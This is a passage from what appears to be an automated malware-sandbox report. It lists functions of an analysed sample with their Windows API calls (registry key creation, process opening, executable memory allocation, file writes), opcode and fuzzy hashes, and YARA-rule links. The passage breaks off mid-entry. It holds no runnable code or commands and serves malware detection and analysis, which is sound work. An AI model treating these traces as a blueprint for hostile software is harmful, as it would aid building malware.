                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 010416FA
                              • memset.NTDLL ref: 0104170B
                              • lstrcmpi.KERNEL32(?,?), ref: 0104174B
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01041777
                              • memcpy.NTDLL(00000000,?,?), ref: 0104178B
                              • memset.NTDLL ref: 01041798
                              • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 010417B1
                              • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 010417D4
                              • HeapFree.KERNEL32(00000000,?), ref: 010417F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 694413484-0
                              • Opcode ID: f35cb2fc7d0f67d2537bbfda0bd946b9f959f8ca8f65848ee563771e88fca051
                              • Instruction ID: 0a518b69de9d87c201ddb7c7f6ff9ace086287061420851d5c68206a146a675f
                              • Opcode Fuzzy Hash: f35cb2fc7d0f67d2537bbfda0bd946b9f959f8ca8f65848ee563771e88fca051
                              • Instruction Fuzzy Hash: 63419AB5A0021AFFDB60CFA8CCC4B9EBBB9BF04354F144079E985A3250D735AA45CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D116, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,00000008,00000000,?,0104FAE0,?,?,010501F4), ref: 0103D12D
                              • lstrlen.KERNEL32(010501F4,?,010501F4), ref: 0103D135
                              • lstrlen.KERNEL32(?), ref: 0103D1A0
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103D1CB
                              • memcpy.NTDLL(00000000,00000002,010500F6), ref: 0103D1DC
                              • memcpy.NTDLL(00000000,?,?), ref: 0103D1F2
                              • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0103D204
                              • memcpy.NTDLL(00000000,0104A3F8,00000002,00000000,?,?,00000000,?,?), ref: 0103D217
                              • memcpy.NTDLL(00000000,?,00000002), ref: 0103D22C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$lstrlen$AllocateHeap
                              • String ID:
                              • API String ID: 3386453358-0
                              • Opcode ID: 58b03031f8b17c7ab671127c68099bec97967f6b872282b2dcfd18c0083f8b25
                              • Instruction ID: 3cf985a3d513f60986c92f3f2afa0a2ada6582c524518a6f901c7a88b61dda71
                              • Opcode Fuzzy Hash: 58b03031f8b17c7ab671127c68099bec97967f6b872282b2dcfd18c0083f8b25
                              • Instruction Fuzzy Hash: F3413B76D0020AFBCF10DFE8CC80A9EBBB9FF98214F144456E985A7205E731DA509B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102EBD5, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01043C8A: RtlEnterCriticalSection.NTDLL(01050488), ref: 01043C92
                                • Part of subcall function 01043C8A: RtlLeaveCriticalSection.NTDLL(01050488), ref: 01043CA7
                                • Part of subcall function 01043C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 01043CC0
                              • RtlAllocateHeap.NTDLL(00000000,010429F2,00000000), ref: 0102EC26
                              • lstrlen.KERNEL32(00000008,?,?,?,010429F2,00000000), ref: 0102EC35
                              • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0102EC47
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,010429F2,00000000), ref: 0102EC57
                              • memcpy.NTDLL(00000000,00000000,010429F2,?,?,?,010429F2,00000000), ref: 0102EC69
                              • lstrcpy.KERNEL32(00000020), ref: 0102EC9B
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 0102ECA7
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102ECFF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 3746371830-0
                              • Opcode ID: 21fbce2013ecbffcd473bfed25a764bd66f6589e274d559f07507c51e694c2c4
                              • Instruction ID: afdc4b616ccbe0db5c9998b127da6c57ce133aa3b3a38c3bb6e55027eeb2651a
                              • Opcode Fuzzy Hash: 21fbce2013ecbffcd473bfed25a764bd66f6589e274d559f07507c51e694c2c4
                              • Instruction Fuzzy Hash: F84155B5640719EFDB619F98C984B5ABFF8FF48310F208459F88997214DB36A950CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102C26F, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103EBB5: RtlAllocateHeap.NTDLL(00000000,?), ref: 0103EBE7
                                • Part of subcall function 0103EBB5: HeapFree.KERNEL32(00000000,00000000,?,?,?,0102A260,?,00000022,?,00000000,010501F4,?,?,0102121E,?,00000000), ref: 0103EC0C
                                • Part of subcall function 0102F0C6: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0102C2AC,?,?,?,?,?,00000022,00000000,00000000), ref: 0102F102
                                • Part of subcall function 0102F0C6: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0102C2AC,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102F155
                              • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102C2E1
                              • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102C2E9
                              • lstrlen.KERNEL32(?), ref: 0102C2F3
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102C308
                              • wsprintfA.USER32 ref: 0102C344
                              • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0102C363
                              • HeapFree.KERNEL32(00000000,?), ref: 0102C378
                              • HeapFree.KERNEL32(00000000,?), ref: 0102C385
                              • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0102C393
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                              • String ID:
                              • API String ID: 168057987-0
                              • Opcode ID: 21e1b01f8448d7c366a632e5c45a43846eb2e566be9235d60b5637bf44d3ee73
                              • Instruction ID: 5f4824f1a03dfe9e346c5fd5cab53b9e9458950bbb4343accb2e1950b407d8a7
                              • Opcode Fuzzy Hash: 21e1b01f8448d7c366a632e5c45a43846eb2e566be9235d60b5637bf44d3ee73
                              • Instruction Fuzzy Hash: 5231B071600316BFDB21AF64DC44E9FBBE9FF88750F00092AF5C496160D7758918CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01026D99, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                              • GetLastError.KERNEL32 ref: 01026DE4
                              • WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                              • SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                              • WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                              • SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                              • GetLastError.KERNEL32 ref: 01026E80
                              • CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                              • String ID:
                              • API String ID: 2864405449-0
                              • Opcode ID: 2df3b763cf73f0a2b45c05d1db62cad53e052f8b20f8bded5d14a95d3a747209
                              • Instruction ID: a8097600ff0dca487df98ae86a5b039b24214f969cfae2a314215da47ecf3b2c
                              • Opcode Fuzzy Hash: 2df3b763cf73f0a2b45c05d1db62cad53e052f8b20f8bded5d14a95d3a747209
                              • Instruction Fuzzy Hash: 35317C71900218FFEF218FA8DE49BAE7BB9EB04315F104195FA91E61D0C77A8A509F20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010297EA, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,00000001,00000000,01030E83,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000001), ref: 01029809
                              • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0102983D
                              • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 01029845
                              • GetLastError.KERNEL32 ref: 0102984F
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0102986B
                              • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 01029884
                              • CancelIo.KERNEL32(?), ref: 01029899
                              • CloseHandle.KERNEL32(?), ref: 010298A9
                              • GetLastError.KERNEL32 ref: 010298B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                              • String ID:
                              • API String ID: 4263211335-0
                              • Opcode ID: a9cec3cdfdef8135763189ec532de57a4691d3aa4fc10933d0dd06a4e67f348d
                              • Instruction ID: d1a3713baf7c96b791b300e516ef8c7b2ece40b576d916a09e9694f6edad6414
                              • Opcode Fuzzy Hash: a9cec3cdfdef8135763189ec532de57a4691d3aa4fc10933d0dd06a4e67f348d
                              • Instruction Fuzzy Hash: 4F218D76A00238FFDB119FA8D9888EE7BB9FF48354F044026FA46D3154D77686008BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102F001, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0102F00D
                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0102F023
                              • _snwprintf.NTDLL ref: 0102F048
                              • CreateFileMappingW.KERNEL32(000000FF,01050244,00000004,00000000,00001000,?), ref: 0102F064
                              • GetLastError.KERNEL32 ref: 0102F076
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0102F08D
                              • CloseHandle.KERNEL32(00000000), ref: 0102F0AE
                              • GetLastError.KERNEL32 ref: 0102F0B6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: 45208e6cc231c9dfca992931306bb6d4623817b9832880401944bf5ee8eba87c
                              • Instruction ID: 9989c068d4f5cfeed461fda17e3bf466037aa50b21b9c66b135a41c205bb8476
                              • Opcode Fuzzy Hash: 45208e6cc231c9dfca992931306bb6d4623817b9832880401944bf5ee8eba87c
                              • Instruction Fuzzy Hash: 982124B6680215FBD720EFA8CD84FCE7BB9AB44780F100061F682E7184DAB99504CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B32D, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(00000000,?,04B39971,?,?,04B39971,?,?,04B39971,?,?,04B39971,?), ref: 0102B42B
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0102B44E
                              • lstrcatW.KERNEL32(00000000,00000000), ref: 0102B456
                              • lstrlenW.KERNEL32(00000000,?,04B39971,?,?,04B39971,?,?,04B39971,?,?,04B39971,?,?,04B39971,?), ref: 0102B4A1
                              • memcpy.NTDLL(00000000,?,?,?), ref: 0102B509
                              • LocalFree.KERNEL32(?,?), ref: 0102B520
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                              • String ID: P
                              • API String ID: 3649579052-3110715001
                              • Opcode ID: f1bb7cdd5e4699a9187d154a918d35e63ad18f20981ad973827cc10adc96be82
                              • Instruction ID: dc555bf729e471c1a63a17dbc00eee745771951adee1ae398e52523e2c968055
                              • Opcode Fuzzy Hash: f1bb7cdd5e4699a9187d154a918d35e63ad18f20981ad973827cc10adc96be82
                              • Instruction Fuzzy Hash: A3614B7190021EABDF20DFA8DD84AEFBBBCEF48344B054065FA80E7214DB759905CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01038B6D, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145timestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0104664E: InterlockedIncrement.KERNEL32(?), ref: 0104669F
                                • Part of subcall function 0104664E: RtlLeaveCriticalSection.NTDLL(04B3C148), ref: 0104672A
                              • OpenProcess.KERNEL32(00000410,0A74F33B,010322DF,00000000,00000000,010322DF,0000001C,00000000,00000000,?,?,?,010322DF), ref: 01038BC7
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,010322EF,00000104,?,?,?,010322DF), ref: 01038BE5
                              • GetSystemTimeAsFileTime.KERNEL32(010322DF), ref: 01038C4B
                              • lstrlenW.KERNEL32(010501E4), ref: 01038CC0
                              • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 01038CDC
                              • memcpy.NTDLL(00000014,010501E4,00000002), ref: 01038CF4
                                • Part of subcall function 01028F84: RtlLeaveCriticalSection.NTDLL(?), ref: 01029001
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                              • String ID: o
                              • API String ID: 2541713525-252678980
                              • Opcode ID: f02975de8c43af0fc0347c857a2b9986c120df1b4aec91ea8b47447101280e95
                              • Instruction ID: ae50e6764c981983192f2ebffc3f4c4b1a9e48744809f44e101a147ee1d705c2
                              • Opcode Fuzzy Hash: f02975de8c43af0fc0347c857a2b9986c120df1b4aec91ea8b47447101280e95
                              • Instruction Fuzzy Hash: A651B3B161070AEFE725DF64C884BAAB7ECFF44700F1086AAFA85D7144D774D9408B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102DA7D, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010364DE: RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                                • Part of subcall function 010364DE: lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DAC2
                              • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0102DADA
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DB3C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102DB50
                              • WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBA2
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBCB
                              • HeapFree.KERNEL32(00000000,010283DE,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBDB
                              • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,010283DE,010395A5,?,00000001), ref: 0102DBE4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 3503961013-0
                              • Opcode ID: ea8d78c18295b24d964ba863ecc7bac753c2b2a6d16b8e1990fdd88297b90642
                              • Instruction ID: 91c4a8c7763be093b9c6eee7a476b70f325579b4daffcc3ed8a283b7a04a5015
                              • Opcode Fuzzy Hash: ea8d78c18295b24d964ba863ecc7bac753c2b2a6d16b8e1990fdd88297b90642
                              • Instruction Fuzzy Hash: 0641D6B5D00219EFDF529FD4DD848EEBBB9FB08344F10406AF545A2124D33A4E54DB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103C32B, Relevance: 12.1, APIs: 8, Instructions: 112memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(00000000,0000002C,00000000,74785520,767FD3B0,00000001), ref: 0103C35C
                              • StrChrA.SHLWAPI(00000001,0000002C), ref: 0103C36F
                              • StrTrimA.SHLWAPI(00000000,?), ref: 0103C392
                              • StrTrimA.SHLWAPI(00000001,?), ref: 0103C3A1
                              • lstrlen.KERNEL32(74784D40), ref: 0103C3D6
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0103C3E9
                              • lstrcpy.KERNEL32(00000004,74784D40), ref: 0103C407
                              • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0103C42B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                              • String ID:
                              • API String ID: 1974185407-0
                              • Opcode ID: c0fcf8da93f2c4f98dafa1111c51320ac25df25371ed8f3e9900ef4d38d4495b
                              • Instruction ID: d748f8d1120b2404227271e9cc3f357a9738c6da987d70ed7cfd5820c14d09b2
                              • Opcode Fuzzy Hash: c0fcf8da93f2c4f98dafa1111c51320ac25df25371ed8f3e9900ef4d38d4495b
                              • Instruction Fuzzy Hash: C7318E75A00215EBEB219F68C948EAE7FB8FF45740F14805AF985E7204DB759941CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01047D2D, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0103A363), ref: 01047D43
                              • wsprintfA.USER32 ref: 01047D6B
                              • lstrlen.KERNEL32(?), ref: 01047D7A
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              • wsprintfA.USER32 ref: 01047DBA
                              • wsprintfA.USER32 ref: 01047DEF
                              • memcpy.NTDLL(00000000,?,?), ref: 01047DFC
                              • memcpy.NTDLL(00000008,0104A3F8,00000002,00000000,?,?), ref: 01047E11
                              • wsprintfA.USER32 ref: 01047E34
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                              • String ID:
                              • API String ID: 2937943280-0
                              • Opcode ID: e8186246bd959037540a33b755cd358908ab8102bd2a231e1cfaca66f46f9185
                              • Instruction ID: ce7fd9ba47e21ba6a403cd94133976894f62118070cd366278c3c98f3068d570
                              • Opcode Fuzzy Hash: e8186246bd959037540a33b755cd358908ab8102bd2a231e1cfaca66f46f9185
                              • Instruction Fuzzy Hash: 9B411CB5A0020AEFDB10DF98D884EAEB7FCEF48308B144565F599D7211EB35EA05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102570C, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 01025730
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01025742
                              • wcstombs.NTDLL ref: 01025750
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 01025774
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 01025789
                              • mbstowcs.NTDLL ref: 01025796
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010257A8
                              • HeapFree.KERNEL32(00000000,00000000,?,?), ref: 010257C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 316328430-0
                              • Opcode ID: f2a99919db9fb5d36bd02dbf262fcdb5201b694865d791e8edfcd8121a9bd24c
                              • Instruction ID: cbbfbb52de93c5d5bdf1a5ffad556a1cf688566aa0b71c488d1b437baf8ebebf
                              • Opcode Fuzzy Hash: f2a99919db9fb5d36bd02dbf262fcdb5201b694865d791e8edfcd8121a9bd24c
                              • Instruction Fuzzy Hash: 1C219875940209FFDF609FA4ED88F8E7FBAFB44300F104125FA41A2064D7369920DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103A0A4, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0103A0B0
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0103A0CE
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0103A0D6
                              • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0103A0F4
                              • GetLastError.KERNEL32 ref: 0103A108
                              • RegCloseKey.ADVAPI32(?), ref: 0103A113
                              • CloseHandle.KERNEL32(00000000), ref: 0103A11A
                              • GetLastError.KERNEL32 ref: 0103A122
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                              • String ID:
                              • API String ID: 3822162776-0
                              • Opcode ID: 5ae46fea93239e43a91fb7112eb8b0a4d3f9ac19cae5a28e402dee2fbe0d8ed0
                              • Instruction ID: a5987ddc0dfa08ab9a78b02de44a0a6442aaeecbe2f8f889e77edee0c1628f3b
                              • Opcode Fuzzy Hash: 5ae46fea93239e43a91fb7112eb8b0a4d3f9ac19cae5a28e402dee2fbe0d8ed0
                              • Instruction Fuzzy Hash: 411112B9340209FFEB215F54D988BAA3BADEB84351F104415FA86C7144DB76CD14DB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102888F, Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: e8c3b4af9b46709afa9b901a00e783eb66d2c2fca91e26280961f99885079ea9
                              • Instruction ID: d7e8172fe18022694cfe74ccf43b709a6545b865ef7d6ec7a6a162647cdb4e40
                              • Opcode Fuzzy Hash: e8c3b4af9b46709afa9b901a00e783eb66d2c2fca91e26280961f99885079ea9
                              • Instruction Fuzzy Hash: F6B126B9D00229EFEF62DB98CD44AEEBBF8EF09314F0480A6E990B3150D7755A44CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102AAC5, Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCommandLineA.KERNEL32(0104C5C8,00000038,01028E54,00000000,747DF5B0,01025001,?,00000001,?,00000000), ref: 0102AAD6
                              • StrChrA.SHLWAPI(00000000,00000020,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 0102AAE7
                                • Part of subcall function 0103A53E: lstrlen.KERNEL32(0104F072,04B3C0DC,0104F072,00000000,0103F629), ref: 0103A547
                                • Part of subcall function 0103A53E: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0103A56A
                                • Part of subcall function 0103A53E: memset.NTDLL ref: 0103A579
                              • ExitProcess.KERNEL32 ref: 0102ACC9
                                • Part of subcall function 010314BF: StrChrA.SHLWAPI(?,?), ref: 010314E4
                                • Part of subcall function 010314BF: StrTrimA.SHLWAPI(?,0104C49C,00000001), ref: 01031503
                                • Part of subcall function 010314BF: StrChrA.SHLWAPI(?,?), ref: 0103150F
                              • lstrcmp.KERNEL32(?,?), ref: 0102AB55
                              • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 0102AB6D
                                • Part of subcall function 0102555B: GetLastError.KERNEL32(000000FF,00000008,04B38560,000000FF,04B3B7F0,?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001), ref: 0102559B
                                • Part of subcall function 0102555B: CloseHandle.KERNEL32(000000FF,?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 010255A6
                              • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,00000000), ref: 0102ABDF
                              • lstrcmp.KERNEL32(?,?), ref: 0102ABF8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                              • String ID:
                              • API String ID: 739714153-0
                              • Opcode ID: 6861b66737258a3e3a4c373f2853be62534d41c9020356d1418152b83fb72052
                              • Instruction ID: fc1f4f3fc2e58ff7679ca0790fbecbf17884e4907a8ae3cc2c35a55ba3c52acb
                              • Opcode Fuzzy Hash: 6861b66737258a3e3a4c373f2853be62534d41c9020356d1418152b83fb72052
                              • Instruction Fuzzy Hash: BB516EB1A0022AEFDF25AFA4CD84EEEBBB9BF08710F140565F581E7154EB359941CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033D4D, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DA6
                              • lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DC4
                              • RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 01033DED
                              • memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E04
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01033E17
                              • memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E26
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?), ref: 01033E8A
                                • Part of subcall function 01028F84: RtlLeaveCriticalSection.NTDLL(?), ref: 01029001
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                              • String ID:
                              • API String ID: 1635816815-0
                              • Opcode ID: f67d14fad6a213414cf0cd9d880c7c0dabd31a672ea3aacdcae2caffe634318e
                              • Instruction ID: e5a481771df82dc6a28b7488e16356062644a01bb0a3f7614526cfa5976ad939
                              • Opcode Fuzzy Hash: f67d14fad6a213414cf0cd9d880c7c0dabd31a672ea3aacdcae2caffe634318e
                              • Instruction Fuzzy Hash: D441B275900219EFDB62AFA8DC88BDE7FE9FF44340F044065FA85AB1A0C7759950DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102F164, Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 0102F1A5
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0102F1D3
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0102F218
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0102F240
                              • _strupr.NTDLL ref: 0102F26B
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0102F278
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0102F292
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                              • String ID:
                              • API String ID: 3831658075-0
                              • Opcode ID: f78999b2cc8e9b7dcb09c79d7ee97552ad2d28085e21c0e01b86b5dd44709c28
                              • Instruction ID: 439be9557f8f26e269f94708bbb8ee4c187691a6fdf6caa4205446df15cb7614
